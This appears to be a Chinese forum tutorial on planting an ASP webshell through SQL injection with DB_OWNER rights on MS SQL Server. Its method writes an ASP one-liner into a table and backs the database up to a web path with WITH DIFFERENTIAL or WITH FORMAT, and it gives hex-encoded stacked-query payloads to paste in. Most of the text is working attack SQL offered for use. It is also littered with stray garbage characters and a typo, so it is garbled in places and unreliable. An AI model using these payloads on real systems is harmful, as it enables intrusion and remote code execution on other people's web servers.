DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

减少备份文件大小，得到可执行的webshell成功率提高不少
! A( W$ v+ a  y; N一利用差异备份
加一个参数WITH DIFFERENTIAL
' A; D3 ?! {+ e0 V4 {0 I3 u
& v, o( d) n" S9 J2 }4 R0 |; D1
2
3 P# r: e1 H* i( v, y  q7 ^. N3
  ^7 j& h% f4 s1 f4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
; M0 O& H8 [$ ^! `; w( l& I! ccreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
$ Y7 Z# Q7 X. k# hdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

/ K* P# o& L2 Q* s: z* o8 f$ j二利用完全FORMAT
加一个参数WITH FROMAT
2 G" J) U" X9 ^2 T* A! R1 T有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
, s7 |! p; y' y: u/ K
1
2
3
$ E& D9 g' K2 ~5 {  A9 f4
: v; \5 {- o8 z: E( U# x declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
1 @: C" ]0 r, V4 V3 N3 Hinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
' N6 u9 _: H; n* X9 d; O3 \8 @declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
+ L( [* N: m6 O
总的来说就是那么简单几句,下面以备份数据库model为例子
$ K! D# R! z9 {+ Z+ w1
% L& G4 G- M1 V* [$ m
8 H, u9 F: L+ ]1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
( s9 d, ^# e2 y/ u+ H9 j4 k, U
  Q4 A; f! W  x/ ]! ], K2

* v/ }; O$ j6 A. M2 A1
id=1;backup database model to disk='你的路径‘ with differential,format;--
3 c5 G/ _: t, n: s( O